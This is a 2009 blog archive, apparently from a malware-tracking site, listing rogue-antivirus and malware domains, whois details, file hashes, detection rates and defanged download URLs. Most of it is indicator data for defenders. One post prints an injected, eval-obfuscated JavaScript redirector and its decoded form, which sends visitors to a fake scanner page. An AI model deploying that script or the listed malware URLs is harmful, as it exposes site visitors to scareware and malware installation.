Archive for June, 2009

30
Jun

New malware domain: exe-box.com

hxxp://bobo-tube.com/xplays.php?id=40014&name=michael+jackson

Whois entry for bobo-tube.com 216.240.143.7
Kim Werner (kimwerner92@yahoo.com)
3845 Ventura Drive
Santa Cruz
California,95060
US
Tel. +001.76754889843

Whois entry for exe-box.com 64.20.38.172
Norman Troup (normtroup@yahoo.com)
1724 Corbin Branch Road
Johnson City
Tennessee,37601
US
Tel. +001.44589786503

streamviewer.40014.exe
Result: 3/41 (7.32%)
MD5: 19e956cc4dd7def3bc5e031d4be33d75
VirusTotal
ThreatExpert Analysis
hxxp://exe-box.com/

keygen.Portable.Adobe.After.Effects.CS3.45088.exe
Result: 4/41 (9.76%)
MD5: fdd140cb2fa4cab0c1e818206df7885b
VirusTotal
ThreatExpert Analysis
hxxp://exe-box.com/

30
Jun

New rogue domains associated with known malware distributors

These are newly registered domains that are associated with known malware perps. You can click on each domain to view the whois entry.

AS41671
svs-technology.com 194.54.83.78
liveantimalwareproscanv2.com
liveantimalwarescannerv3.com
fast-antimalware-scanv3.com
fast-antimalware-scannerv2.com
1fast-antimalware-scan.com
1fast-antimalware-scanner.com
1liveantimalwarequickscnan.com
1liveantimalwareproscanner.com
1live-antimalware-pro-scan.com
1live-antimalware-scanner.com

30
Jun

Database Update: 31 files (Low/Moderate Detection)

Files added to our database recently.

WARNING: URL’s may still be active.  Proceed at your own risk.

logo.bmp
Result: 0/41 (0%)
MD5: 2084e9d74c7b69328bae463ec1bcfd16
VirusTotal
hxxp://recentbaseupdates.com/logo.bmp

rundll32.exe or AntivirusPlus.exe
Result: 15/41 (36.59%)
MD5: 9fcd867dc11848fc5d21b21445fbc7b9
VirusTotal
ThreatExpert Analysis
hxxp://nextantivirusplus.com/install/

InternetExplorer.dll
Result: 18/41 (43.91%)
MD5: b845fd0c24a794c5406f8a6772998a26
VirusTotal
ThreatExpert Analysis
hxxp://nextantivirusplus.com/install/

a.exe
Result: 1/41 (2.44%)
MD5: e3ed28a166aa120721a4f57531833197
VirusTotal
ThreatExpert Analysis

b.exe
Result: 11/41 (26.83%)
MD5: 1324477cf952062eccd3dc3e00540b37
VirusTotal
ThreatExpert Analysis

c.exe or msa.exe
Result: 8/41 (19.52%)
MD5: 3877597245bb995dbc8714b27a96bc10
VirusTotal
ThreatExpert Analysis

msxml71.dll
Result: 2/41 (4.88%)
MD5: d44b3cb9f39e2458b2f78155e8b1b8a9
VirusTotal
ThreatExpert Analysis

6746.pdf
Result: 19/41 (46.35%)
MD5: b7b7d52a205e950adf4795c14c7f7178
VirusTotal
Wepawet Analysis
hxxp://antivirusxp09.com/traff/pdf.php?id=1118

load.exe or winagent.exe
Result: 22/41 (53.66%)
MD5: 5ee26f43139a2cdb3a79a835574285a0
VirusTotal
ThreatExpert Analysis
hxxp://antivirusxp09.com/traff/load.php?id=1118&spl=2

1.exe
Result: 37/41 (90.25%)
MD5: b5ab26bfcdb6593eadb70c5d56a42a99
VirusTotal
ThreatExpert Analysis
hxxp://sesese.y145c.cn/

EN7hzSreCat8.dll or comres.dll
Result: 37/40 (92.5%)
MD5: 8eff27684cf5225720a48d22665eebdb
VirusTotal
ThreatExpert Analysis

dfc8ac3ed7da.dll
Result: 0/41 (0.00%)
MD5: 6728270cb7dbb776ed086f5ac4c82310
VirusTotal
ThreatExpert Analysis

Setup_build6_102.exe (Rogue: Fast Antivirus 2009)
Result: 2/40 (5%)
MD5: a8b49c0d46d93aa4fb366d8898201809
VirusTotal
ThreatExpert Analysis
hxxp://guardsecurity.info/build6_102.php?cmd=getFile&counter=2&p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjY4nT1m6uqI61h8WilnGbk4F5bw

ReleaseXP.exe
Result: 3/41 (7.32%)
MD5: 4d94aaa4631913325032f6201cd141ee
VirusTotal
ThreatExpert Analysis
hxxp://update1.fastantivirus09.com/

captcha6.exe
Result: 30/41 (73.18%)
MD5: ac479a1ccd4064e6606241779b31bf74
VirusTotal
ThreatExpert Analysis
hxxp://liesbethmilan.be/1/

captcha7.dll
Result: 6/41 (14.64%)
MD5: ee1f766d6c955e426d24c72f3e3c9463
VirusTotal
ThreatExpert Analysis

ms.19.exe or mstre19.exe
Result: 15/41 (36.59%)
MD5: 58270dfd18b345176026ff089ca42352
VirusTotal
ThreatExpert Analysis
hxxp://liesbethmilan.be/1/

load.exe or owner.exe
Result: 29/41 (70.74%)
MD5: 076e74cf244e1f7fbf11159b08c576ba
VirusTotal
ThreatExpert Analysis
hxxp://109438129432.cn/load.php

TubeViewer.ver.6.40000.exe
Result: 4/41 (9.76%)
MD5: 5aeb5ee2dccfb029b865fe30aa7ebb26
VirusTotal
ThreatExpert Analysis
hxxp://load-exe-soft.com/

a.exe
Result: 1/41 (2.44%)
MD5: 49da0a5577c17cca87ffc0115c7da574
VirusTotal
ThreatExpert Analysis

b.exe
Result: 11/41 (26.83%)
MD5: 00baaab086f7d8ec463b074a1ab46bb9
VirusTotal
ThreatExpert Analysis

c.exe or msa.exe
Result: 9/41 (21.96%)
MD5: df7ce58468b46bb5f71a2720166caf16
VirusTotal
ThreatExpert Analysis

msxml71.dll
Result: 2/41 (4.88%)
MD5: 7b0ebaaed7e77e0532140e59e0406d60
VirusTotal
ThreatExpert Analysis

1.exe
Result: 21/40 (52.5%)
MD5: a4c944246ed2138959275b9dd8770bf0
VirusTotal
ThreatExpert Analysis
hxxp://ztb.cztv.tv/360/

2.exe
Result: 32/40 (80%)
MD5: 58e94a21fa5a7100b97c1ccbd091c835
VirusTotal
ThreatExpert Analysis
hxxp://ztb.cztv.tv/360/

7.exe
Result: 34/40 (85%)
MD5: b96716771808bbbb12c17de3de30f04f
VirusTotal
ThreatExpert Analysis
hxxp://ztb.cztv.tv/360/

88.exe
Result: 36/40 (90%)
MD5: b14f3467f24d5eb5d97033da30f5e47c
VirusTotal
ThreatExpert Analysis
hxxp://ztb.cztv.tv/360/

9.exe
Result: 27/40 (67.5%)
MD5: eef2b225fe9b1490fc40e964086238c5
VirusTotal
ThreatExpert Analysis
hxxp://ztb.cztv.tv/360/

wr.exe
Result: 37/41 (90.25%)
MD5: 69749483bb3ed0801e5e888be4321aee
VirusTotal
ThreatExpert Analysis
hxxp://zief.pl/

AXObject.exe
Result: 20/41 (48.79%)
MD5: e55cbcb959b0099e6d151d3e92791daa
VirusTotal
ThreatExpert Analysis
hxxp://go-file.ru/

codec.exe
Result: 20/41 (48.79%)
MD5: 8df3e47e38c8c33f45593437557b6e7c
VirusTotal
ThreatExpert Analysis
hxxp://pornotube915.com/codec/145.exe

29
Jun

Javascript redirection to rogue security software installation

The injected contents into the compromised website.

<script src=”vub.js”></script>
<script>hoeyemcs(‘Mnworkforce+Center’);</script>

vub.js

var str=["889", "886", "885", "885", "885", "994", "973", "990", "908", "988", "987", "994", "937", "924", "935", "889", "886", "885", "885", "885", "978", "993", "986", "975", "992", "981", "987", "986", "908", "980", "987", "977", "997", "977", "985", "975", "991", "916", "989", "993", "977", "990", "997", "917", "999", "889", "886", "885", "885", "885", "885", "995", "981", "986", "976", "987", "995", "922", "984", "987", "975", "973", "992", "981", "987", "986", "937", "915", "980", "992", "992", "988", "934", "923", "923", "931", "928", "922", "932", "930", "922", "925", "928", "928", "922", "925", "931", "932", "923", "993", "990", "984", "923", "979", "987", "922", "988", "980", "988", "939", "991", "981", "976", "937", "925", "929", "914", "989", "937", "915", "908", "919", "908", "989", "993", "977", "990", "997", "908", "919", "908", "915", "915", "935", "889", "886", "885", "885", "885", "1001"];
var temp=”;
var gg=”;
for (i=0; i<str.length; i++){
gg=str[i]-876;
temp=temp+String.fromCharCode(gg);
}
eval(temp);

When the javascript rountine is run, it looks like this.

var pov=0;
function hoeyemcs(query){
window.location=’http://74.86.144.178/url/go.php?sid=15&q=’ + query + ”;
}

This causes mutltiple redirections through domains and ulimately to the fake scanning page.

hxxp://74.86.144.178/url/go.php?sid=15&q=
Redirects to
hxxp://dadquox.cn/?wm=70126&q=
Redirects to
hxxp://atuyfe.cn/?wm=70126

Whois entry for atuyfe.cn 195.95.151.174
ROID: 20081230s10001s20184853-cn
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.pubilcnameserver7.com
Name Server:ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 10:00
Expiration Date: 2009-12-30 10:00

AS40965
EASTNET-UA-AS

acajelu.cn
adayby.cn
adiuqga.cn
ajowah.cn
ajuadeb.cn
akaysu.cn
akipahu.cn
amayrex.cn
amocyux.cn
anamuco.cn
aniuha.cn
ateudny.cn
atiqad.cn
atoacu.cn
atuyfe.cn
countedantiviruspro.com
exeype.cn
ezeunac.cn
ferojaw.cn
fevopru.cn
fexonhu.cn
fidteur.cn
getavplusnow.com
gihugyx.cn
giwgeam.cn
gojaxty.cn
megaantivirusplus.com
nextantivirusplus.com
suxpymi.cn
www.acyikap.cn
www.adiuqga.cn
www.adocyha.cn
www.ajuadeb.cn
www.akaysu.cn
www.anoemyx.cn
www.antivirusplus-ok.com
www.ateudny.cn
www.atoacu.cn
www.exeype.cn
www.fevopru.cn
www.fidteur.cn

installer_70126.exe
Result: 19/41 (46.35%)
MD5: aaead5bc5202b75c8e1553ede907084a
VirusTotal
ThreatExpert Analysis
hxxp://atuyfe.cn/installer_70126.exe

29
Jun

Domains associated with rogue campaigns

These domains are associated with known malware operators. Most of these domains do not yet resolve but probably will over the next couple of months. You can click on each domain to view the whois entry for the domain.

AS41671 194.54.80.0/22
quickspywarescannerv3.com
fastantiviruscheckv2.com
homebodiesmusic.com 195.39.196.44 NS1.S-HOSTING.BIZ NS2.S-HOSTING.BIZ
purchuasebestsoftwareonline.com
buybestsoftwareonline.com
purchuasepremiumprotection.com
purchuasepremiumsoftware.com
buysoftwaresubscription.com
bennysaintscathedral.com
spywareurladvisor.com
satisfatcionvulture.com
malwareurldownload.com
softprodefender.com
cnet-uploads.com
comperhensiveupdates.com
buysecuritysoftwareonline.com

AS19194
antivirussystemfolderscanv3.com 63.223.110.178 NS1.EVERYDNS.NET NS2.EVERYDNS.NET NS3.EVERYDNS.NET NS4.EVERYDNS.NET
winonlinescanner.com 78.47.132.221 NS1.EVERYDNS.NET NS2.EVERYDNS.NET NS3.EVERYDNS.NET NS4.EVERYDNS.NET

AS36351
spywarecomputerscanv2.com 83.133.126.155 NS1.EVERYDNS.NET NS2.EVERYDNS.NET NS3.EVERYDNS.NET NS4.EVERYDNS.NET
antivirusfolderscanner.com

AS15135
explorerantivirusscanner.com
explorerfilescan.com

AS30968
arskoe.com 77.221.148.178 NS21.DNS-RUS.NET NS22.DNS-RUS.NET

This information was sent to us. Thanks to everyone that contributes to MDB.

29
Jun

New rogue domain: folderantispywarescanner.com

hxxp://spacefunk.cn/go.php?id=2009-1320&key=cd19f5036&p=1
redirects to
hxxp://folderantispywarescanner.com/1/?id=2009-1320&query=d9be45bbe&back=%3DjQ01TjyNcQOMI%3DN

Whois entry for folderantispywarescanner.com 69.10.59.35

Setup-6216_02009-1320.exe
Result: 2/41 (4.88%)
MD5: 7af4845b4ae1ae702905bb51be3e52c0
VirusTotal
ThreatExpert Analysis
hxxp://folderantispywarescanner.com/download/

26
Jun

Rogue domain: fastfolderscanner.com

hxxp://fastfolderscanner.com/1/?id=2009-1939&query=d9be45bbe&back=%3DDQ25DjwNgQMMI%3DN

Whois entry for fastfolderscanner.com 83.133.125.116

Setup-4e45fce_02009-1939.exe
Result: 0/41 (0%)
MD5: e787b1a7af2cf5642381d142e0534c22
VirusTotal
ThreatExpert Analysis
hxxp://fastfolderscanner.com/download.php?id=2009-1939

26
Jun

New malware domain: extrafiles-softportal.com

http://alls-tube-here.com/xplays.php?id=40014&name=david+carradine

Whois entry for extrafiles-softportal.com PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

streamviewer.40014.exe
Result: 3/41 (7.32%)
MD5: 98eef72053f4ce3c22718bd79c0c54ce
VirusTotal
ThreatExpert Analysis

http://extrafiles-softportal.com/






 

June 2009
M T W T F S S
« May   Jul »
1234567
891011121314
15161718192021
22232425262728
2930